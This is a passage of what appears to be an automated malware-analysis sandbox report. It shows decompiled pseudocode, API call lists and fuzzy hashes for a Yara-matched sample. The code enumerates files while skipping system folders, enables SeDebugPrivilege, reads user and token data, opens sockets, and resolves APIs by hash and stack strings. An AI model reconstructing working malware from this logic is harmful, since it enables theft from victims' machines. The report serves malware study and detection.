                                            				void* _t52;
                                            				int _t56;
                                            				intOrPtr _t60;
                                            				void* _t66;
                                            				void* _t73;
                                            				void* _t74;
                                            				WCHAR* _t98;
                                            				void* _t99;
                                            				void* _t100;
                                            				void* _t101;
                                            				WCHAR* _t102;
                                            				void* _t103;
                                            				void* _t104;
                                            
                                            				L004067C4(0xa); // executed
                                            				_t72 = 0;
                                            				_t100 = 0x2e;
                                            				_t106 = _a16;
                                            				if(_a16 == 0) {
                                            					L15:
                                            					_push(_a8);
                                            					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                                            					_t104 = _t103 + 0xc;
                                            					if(_t98 == 0) {
                                            						L30:
                                            						__eflags = 0;
                                            						return 0;
                                            					}
                                            					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                                            					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                                            					_t73 = _t35;
                                            					if(_t73 == 0xffffffff) {
                                            						L29:
                                            						E00402BAB(_t98);
                                            						goto L30;
                                            					}
                                            					L17:
                                            					while(1) {
                                            						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                                            							if(_v596.dwFileAttributes != 0x10) {
                                            								L21:
                                            								_push( &(_v596.cFileName));
                                            								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                                            								_t104 = _t104 + 0xc;
                                            								if(_t101 == 0) {
                                            									goto L24;
                                            								}
                                            								if(_a12 == 0) {
                                            									E00402BAB(_t98);
                                            									E00403BEF(_t73);
                                            									return _t101;
                                            								}
                                            								_a12(_t101);
                                            								E00402BAB(_t101);
                                            								goto L24;
                                            							}
                                            							_t124 = _a20;
                                            							if(_a20 == 0) {
                                            								goto L24;
                                            							}
                                            							goto L21;
                                            						} else {
                                            							L24:
                                            							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                                            							_t43 = FindNextFileW(_t73,  &_v596); // executed
                                            							if(_t43 == 0) {
                                            								E00403BEF(_t73); // executed
                                            								goto L29;
                                            							}
                                            							_t100 = 0x2e;
                                            							continue;
                                            						}
                                            					}
                                            				}
                                            				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                                            				if(_t102 == 0) {
                                            					L14:
                                            					_t100 = 0x2e;
                                            					goto L15;
                                            				}
                                            				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                                            				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                                            				_t74 = _t52;
                                            				if(_t74 == 0xffffffff) {
                                            					L13:
                                            					E00402BAB(_t102);
                                            					_t72 = 0;
                                            					goto L14;
                                            				} else {
                                            					goto L3;
                                            				}
                                            				do {
                                            					L3:
                                            					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                            						goto L11;
                                            					}
                                            					if(_a24 == 0) {
                                            						L7:
                                            						if(E00405D24( &(_v596.cFileName)) >= 3) {
                                            							L9:
                                            							_push( &(_v596.cFileName));
                                            							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                                            							_t103 = _t103 + 0xc;
                                            							_a16 = _t60;
                                            							_t115 = _t60;
                                            							if(_t60 == 0) {
                                            								goto L11;
                                            							}
                                            							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                                            							E00402BAB(_a16);
                                            							_t103 = _t103 + 0x1c;
                                            							if(_t99 != 0) {
                                            								E00402BAB(_t102);
                                            								E00403BEF(_t74);
                                            								return _t99;
                                            							}
                                            							goto L11;
                                            						}
                                            						_t66 = 0x2e;
                                            						_t114 = _v596.cFileName - _t66;
                                            						if(_v596.cFileName == _t66) {
                                            							goto L11;
                                            						}
                                            						goto L9;
                                            					}
                                            					_push(L"Windows");
                                            					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                            						goto L11;
                                            					}
                                            					_push(L"Program Files");
                                            					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                            						goto L11;
                                            					}
                                            					goto L7;
                                            					L11:
                                            					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                                            					_t56 = FindNextFileW(_t74,  &_v596); // executed
                                            				} while (_t56 != 0);
                                            				E00403BEF(_t74); // executed
                                            				goto L13;
                                            			}

                                            0x00403d82
                                            0x00403d88
                                            0x00403d8c
                                            0x00403d8d
                                            0x00403d90
                                            0x00403ea9
                                            0x00403ea9
                                            0x00403eb9
                                            0x00403ebb
                                            0x00403ec0
                                            0x00403f95
                                            0x00403f95
                                            0x00000000
                                            0x00403f95
                                            0x00403ece
                                            0x00403edb
                                            0x00403edd
                                            0x00403ee2
                                            0x00403f8e
                                            0x00403f8f
                                            0x00000000
                                            0x00403f94
                                            0x00000000
                                            0x00403ee8
                                            0x00403ef8
                                            0x00403f0a
                                            0x00403f12
                                            0x00403f18
                                            0x00403f26
                                            0x00403f28
                                            0x00403f2d
                                            0x00000000
                                            0x00000000
                                            0x00403f33
                                            0x00403f76
                                            0x00403f7c
                                            0x00000000
                                            0x00403f83
                                            0x00403f36
                                            0x00403f3a
                                            0x00000000
                                            0x00403f40
                                            0x00403f0c
                                            0x00403f10
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403f41
                                            0x00403f41
                                            0x00403f4b
                                            0x00403f58
                                            0x00403f5c
                                            0x00403f88
                                            0x00000000
                                            0x00403f8d
                                            0x00403f60
                                            0x00000000
                                            0x00403f60
                                            0x00403ef8
                                            0x00403ee8
                                            0x00403da3
                                            0x00403da9
                                            0x00403ea6
                                            0x00403ea8
                                            0x00000000
                                            0x00403ea8
                                            0x00403db7
                                            0x00403dc4
                                            0x00403dc6
                                            0x00403dcb
                                            0x00403e9d
                                            0x00403e9e
                                            0x00403ea4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403dd1
                                            0x00403dd1
                                            0x00403dd8
                                            0x00000000
                                            0x00000000
                                            0x00403de2
                                            0x00403e12
                                            0x00403e22
                                            0x00403e30
                                            0x00403e36
                                            0x00403e3f
                                            0x00403e44
                                            0x00403e47
                                            0x00403e4a
                                            0x00403e4c
                                            0x00000000
                                            0x00000000
                                            0x00403e63
                                            0x00403e65
                                            0x00403e6a
                                            0x00403e6f
                                            0x00403f64
                                            0x00403f6a
                                            0x00000000
                                            0x00403f71
                                            0x00000000
                                            0x00403e6f
                                            0x00403e26
                                            0x00403e27
                                            0x00403e2e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403e2e
                                            0x00403dea
                                            0x00403df9
                                            0x00000000
                                            0x00000000
                                            0x00403e01
                                            0x00403e10
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403e75
                                            0x00403e7f
                                            0x00403e8c
                                            0x00403e8e
                                            0x00403e97
                                            0x00000000

                                            APIs
                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileFind$FirstNext
                                            • String ID: %s\%s$%s\*$Program Files$Windows
                                            • API String ID: 1690352074-2009209621
                                            • Opcode ID: 16b975ea2879a45a9effdb1f305e21ca7c68cdc893d4167e4adf6413639c420c
                                            • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                            • Opcode Fuzzy Hash: 16b975ea2879a45a9effdb1f305e21ca7c68cdc893d4167e4adf6413639c420c
                                            • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                                            				void* _v8;
                                            				struct _LUID _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				struct _TOKEN_PRIVILEGES _v32;
                                            				intOrPtr* _t13;
                                            				void* _t14;
                                            				int _t16;
                                            				int _t31;
                                            				void* _t32;
                                            
                                            				_t31 = 0;
                                            				E004060AC();
                                            				_t32 = __eax;
                                            				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                            				_t14 =  *_t13(_t32, 0x28,  &_v8);
                                            				if(_t14 != 0) {
                                            					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                                            					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                                            					if(_t16 != 0) {
                                            						_push(__ebx);
                                            						_v32.Privileges = _v16.LowPart;
                                            						_v32.PrivilegeCount = 1;
                                            						_v24 = _v16.HighPart;
                                            						_v20 = 2;
                                            						E004031E5(1, 9, 0xc1642df2, 0, 0);
                                            						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                                            						_t31 =  !=  ? 1 : 0;
                                            					}
                                            					E00403C40(_v8);
                                            					return _t31;
                                            				}
                                            				return _t14;
                                            			}

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                            • String ID: SeDebugPrivilege
                                            • API String ID: 3615134276-2896544425
                                            • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                            • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                            • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                            • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402B7C(long _a4) {
                                            				void* _t4;
                                            				void* _t7;
                                            
                                            				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                            				_t7 = _t4;
                                            				if(_t7 != 0) {
                                            					E00402B4E(_t7, 0, _a4);
                                            				}
                                            				return _t7;
                                            			}

                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                            • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateProcess
                                            • String ID:
                                            • API String ID: 1357844191-0
                                            • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                            • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                            • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                            • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00406069(WCHAR* _a4, DWORD* _a8) {
                                            				int _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                                            				_t4 = GetUserNameW(_a4, _a8); // executed
                                            				return _t4;
                                            			}

                                            APIs
                                            • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                            • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                            • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                            • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: recv
                                            • String ID:
                                            • API String ID: 1507349165-0
                                            • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                            • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                            • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                            • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                                            				int _v8;
                                            				long _v12;
                                            				int _v16;
                                            				int _v20;
                                            				char _v24;
                                            				char _v28;
                                            				char _v32;
                                            				intOrPtr* _t25;
                                            				int _t27;
                                            				int _t30;
                                            				int _t31;
                                            				int _t36;
                                            				int _t37;
                                            				intOrPtr* _t39;
                                            				int _t40;
                                            				long _t44;
                                            				intOrPtr* _t45;
                                            				int _t46;
                                            				void* _t48;
                                            				int _t49;
                                            				void* _t67;
                                            				void* _t68;
                                            				void* _t74;
                                            
                                            				_t48 = __ebx;
                                            				_t67 = 0;
                                            				_v8 = 0;
                                            				E00402BF2();
                                            				_t68 = __eax;
                                            				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                                            				_t2 =  &_v8; // 0x414449
                                            				_push(1);
                                            				_push(8);
                                            				_push(_t68);
                                            				if( *_t25() != 0) {
                                            					L4:
                                            					_t27 = E00402B7C(0x208);
                                            					_v20 = _t27;
                                            					__eflags = _t27;
                                            					if(_t27 != 0) {
                                            						E0040338C(_t27, _t67, 0x104);
                                            						_t74 = _t74 + 0xc;
                                            					}
                                            					_push(_t48);
                                            					_t49 = E00402B7C(0x208);
                                            					__eflags = _t49;
                                            					if(_t49 != 0) {
                                            						E0040338C(_t49, _t67, 0x104);
                                            						_t74 = _t74 + 0xc;
                                            					}
                                            					_v28 = 0x208;
                                            					_v24 = 0x208;
                                            					_t7 =  &_v8; // 0x414449
                                            					_v12 = _t67;
                                            					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                                            					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                                            					__eflags = _t30;
                                            					if(_t30 == 0) {
                                            						_t36 = E00402B7C(_v12);
                                            						_v16 = _t36;
                                            						__eflags = _t36;
                                            						if(_t36 != 0) {
                                            							_t14 =  &_v8; // 0x414449, executed
                                            							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                                            							__eflags = _t37;
                                            							if(_t37 != 0) {
                                            								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                                            								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                                            								__eflags = _t40;
                                            								if(__eflags != 0) {
                                            									_t67 = E00405B6F(__eflags, L"%s", _t49);
                                            								}
                                            							}
                                            							E00402BAB(_v16);
                                            						}
                                            					}
                                            					__eflags = _v8;
                                            					if(_v8 != 0) {
                                            						E00403C40(_v8); // executed
                                            					}
                                            					__eflags = _t49;
                                            					if(_t49 != 0) {
                                            						E00402BAB(_t49);
                                            					}
                                            					_t31 = _v20;
                                            					__eflags = _t31;
                                            					if(_t31 != 0) {
                                            						E00402BAB(_t31);
                                            					}
                                            					return _t67;
                                            				}
                                            				_t44 = GetLastError();
                                            				if(_t44 == 0x3f0) {
                                            					E004060AC();
                                            					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                            					_t3 =  &_v8; // 0x414449
                                            					_t46 =  *_t45(_t44, 8, _t3);
                                            					__eflags = _t46;
                                            					if(_t46 == 0) {
                                            						goto L2;
                                            					}
                                            					goto L4;
                                            				}
                                            				L2:
                                            				return 0;
                                            			}

                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                            • _wmemset.LIBCMT ref: 00406244
                                            • _wmemset.LIBCMT ref: 00406261
                                            • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: _wmemset$ErrorInformationLastToken
                                            • String ID: IDA$IDA
                                            • API String ID: 487585393-2020647798
                                            • Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                                            • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                            • Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                                            • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				void _v40;
                                            				void* _t23;
                                            				signed int _t24;
                                            				signed int* _t25;
                                            				signed int _t30;
                                            				signed int _t31;
                                            				signed int _t33;
                                            				signed int _t41;
                                            				void* _t42;
                                            				signed int* _t43;
                                            
                                            				_v8 = _v8 & 0x00000000;
                                            				_t33 = 8;
                                            				memset( &_v40, 0, _t33 << 2);
                                            				_v32 = 1;
                                            				_t23 =  &_v40;
                                            				_v28 = 6;
                                            				_v36 = 2;
                                            				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                                            				if(_t23 == 0) {
                                            					_t24 = E00402B7C(4);
                                            					_t43 = _t24;
                                            					_t31 = _t30 | 0xffffffff;
                                            					 *_t43 = _t31;
                                            					_t41 = _v8;
                                            					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                                            					 *_t43 = _t24;
                                            					if(_t24 != _t31) {
                                            						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                                            						if(_t24 == _t31) {
                                            							E00404DE5(_t24,  *_t43);
                                            							 *_t43 = _t31;
                                            						}
                                            						__imp__freeaddrinfo(_v8);
                                            						if( *_t43 != _t31) {
                                            							_t25 = _t43;
                                            							goto L10;
                                            						} else {
                                            							E00402BAB(_t43);
                                            							L8:
                                            							_t25 = 0;
                                            							L10:
                                            							return _t25;
                                            						}
                                            					}
                                            					E00402BAB(_t43);
                                            					__imp__freeaddrinfo(_v8);
                                            					goto L8;
                                            				}
                                            				return 0;
                                             			}

                                             Statement address column (spilled from the side-by-side view of the decompiled code above): 0x00404e1d 0x00404e26 0x00404e2a 0x00404e2f 0x00404e37 0x00404e3a 0x00404e45 0x00404e4f 0x00404e57 0x00404e61 0x00404e66 0x00404e68 0x00404e6c 0x00404e6e 0x00404e7a 0x00404e80 0x00404e84 0x00404e9f 0x00404ea7 0x00404eab 0x00404eb1 0x00404eb1 0x00404eb6 0x00404ebe 0x00404ecb 0x00000000 0x00404ec0 0x00404ec1 0x00404ec7 0x00404ec7 0x00404ecd 0x00000000 0x00404ece 0x00404ebe 0x00404e87 0x00404e90 0x00000000 0x00404e90 0x00000000

                                            APIs
                                            • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                            • socket.WS2_32(?,?,?), ref: 00404E7A
                                            • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: freeaddrinfogetaddrinfosocket
                                            • String ID:
                                            • API String ID: 2479546573-0
                                            • Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                                            • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                            • Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                                            • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                                            				struct _SECURITY_ATTRIBUTES* _v8;
                                            				char _v12;
                                            				long _v16;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* _t16;
                                            				intOrPtr* _t25;
                                            				long* _t28;
                                            				void* _t30;
                                            				int _t32;
                                            				intOrPtr* _t33;
                                            				void* _t35;
                                            				void* _t42;
                                            				intOrPtr _t43;
                                            				long _t44;
                                            				struct _OVERLAPPED* _t46;
                                            
                                            				_t46 = 0;
                                            				_t35 = 0;
                                            				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                                            				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                            				_t42 = _t16;
                                            				_v8 = _t42;
                                            				if(_t42 == 0xffffffff) {
                                            					__eflags = _a12;
                                            					if(_a12 == 0) {
                                            						L10:
                                            						return _t35;
                                            					}
                                            					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                                            					__eflags = _t43;
                                            					if(_t43 == 0) {
                                            						goto L10;
                                            					}
                                            					_push(0);
                                            					__eflags = E00403C59(_a4, _t43);
                                            					if(__eflags != 0) {
                                            						_v8 = 0;
                                            						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                                            						_push(_t43);
                                            						 *_a8 = _v8;
                                            						E00403D44();
                                            					}
                                            					E00402BAB(_t43);
                                            					return _t46;
                                            				}
                                            				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                                            				_t44 =  *_t25(_t42,  &_v12);
                                            				if(_v12 != 0 || _t44 > 0x40000000) {
                                            					L8:
                                            					_t45 = _v8;
                                            					goto L9;
                                            				} else {
                                            					_t28 = _a8;
                                            					if(_t28 != 0) {
                                            						 *_t28 = _t44;
                                            					}
                                            					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                                            					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                                            					_t35 = _t30;
                                            					if(_t35 == 0) {
                                            						goto L8;
                                            					} else {
                                            						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                                            						_t45 = _v8;
                                            						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                                            						if(_t32 == 0) {
                                            							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                                            							 *_t33(_t35, _t46, 0x8000);
                                            							_t35 = _t46;
                                            						}
                                            						L9:
                                            						E00403C40(_t45); // executed
                                            						goto L10;
                                            					}
                                            				}
                                             			}

                                             Statement address column (spilled from the side-by-side view of the decompiled code above): 0x004040c4 0x004040ce 0x004040d0 0x004040e8 0x004040ea 0x004040ec 0x004040f2 0x0040418d 0x00404190 0x00404184 0x00000000 0x00404184 0x004041a0 0x004041a5 0x004041a7 0x00000000 0x00000000 0x004041a9 0x004041b6 0x004041b8 0x004041be 0x004041cb 0x004041d0 0x004041d1 0x004041d3 0x004041d8 0x004041dc 0x00000000 0x004041e2 0x00404100 0x0040410c 0x00404111 0x0040417a 0x0040417a 0x00000000 0x0040411b 0x0040411b 0x00404120 0x00404122 0x00404122 0x0040412c 0x0040413a 0x0040413c 0x00404140 0x00000000 0x00404142 0x0040414a 0x00404155 0x0040415a 0x0040415e 0x00404168 0x00404174 0x00404176 0x00404176 0x0040417d 0x0040417e 0x00000000 0x00404183 0x00404140

                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: File$AllocCreateReadVirtual
                                            • String ID: .tmp
                                            • API String ID: 3585551309-2986845003
                                            • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                            • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                            • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                            • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E00413866(void* __eflags) {
                                            				short _v6;
                                            				short _v8;
                                            				short _v10;
                                            				short _v12;
                                            				short _v14;
                                            				short _v16;
                                            				short _v18;
                                            				short _v20;
                                            				short _v22;
                                            				char _v24;
                                            				short _v28;
                                            				short _v30;
                                            				short _v32;
                                            				short _v34;
                                            				short _v36;
                                            				short _v38;
                                            				short _v40;
                                            				short _v42;
                                            				short _v44;
                                            				short _v46;
                                            				char _v48;
                                            				short _v52;
                                            				short _v54;
                                            				short _v56;
                                            				short _v58;
                                            				short _v60;
                                            				short _v62;
                                            				short _v64;
                                            				short _v66;
                                            				short _v68;
                                            				short _v70;
                                            				short _v72;
                                            				short _v74;
                                            				char _v76;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* _t38;
                                            				short _t43;
                                            				short _t44;
                                            				short _t45;
                                            				short _t46;
                                            				short _t47;
                                            				short _t48;
                                            				short _t50;
                                            				short _t51;
                                            				short _t52;
                                            				short _t54;
                                            				short _t55;
                                            				intOrPtr* _t57;
                                            				intOrPtr* _t59;
                                            				intOrPtr* _t61;
                                            				void* _t63;
                                            				WCHAR* _t65;
                                            				long _t68;
                                            				void* _t75;
                                            				short _t76;
                                            				short _t78;
                                            				short _t83;
                                            				short _t84;
                                            				short _t85;
                                            
                                            				E00402C6C(_t38);
                                            				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                                            				SetErrorMode(3); // executed
                                            				_t43 = 0x4f;
                                            				_v76 = _t43;
                                            				_t44 = 0x4c;
                                            				_v74 = _t44;
                                            				_t45 = 0x45;
                                            				_v72 = _t45;
                                            				_t46 = 0x41;
                                            				_v70 = _t46;
                                            				_t47 = 0x55;
                                            				_v68 = _t47;
                                            				_t48 = 0x54;
                                            				_t76 = 0x33;
                                            				_t84 = 0x32;
                                            				_t83 = 0x2e;
                                            				_t78 = 0x64;
                                            				_t85 = 0x6c;
                                            				_v66 = _t48;
                                            				_v52 = 0;
                                            				_t50 = 0x77;
                                            				_v48 = _t50;
                                            				_t51 = 0x73;
                                            				_v46 = _t51;
                                            				_t52 = 0x5f;
                                            				_v42 = _t52;
                                            				_v28 = 0;
                                            				_t54 = 0x6f;
                                            				_v24 = _t54;
                                            				_t55 = 0x65;
                                            				_v20 = _t55;
                                            				_v64 = _t76;
                                            				_v62 = _t84;
                                            				_v60 = _t83;
                                            				_v58 = _t78;
                                            				_v56 = _t85;
                                            				_v54 = _t85;
                                            				_v44 = _t84;
                                            				_v40 = _t76;
                                            				_v38 = _t84;
                                            				_v36 = _t83;
                                            				_v34 = _t78;
                                            				_v32 = _t85;
                                            				_v30 = _t85;
                                            				_v22 = _t85;
                                            				_v18 = _t76;
                                            				_v16 = _t84;
                                            				_v14 = _t83;
                                            				_v12 = _t78;
                                            				_v10 = _t85;
                                            				_v8 = _t85;
                                            				_v6 = 0;
                                            				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                            				 *_t57( &_v76);
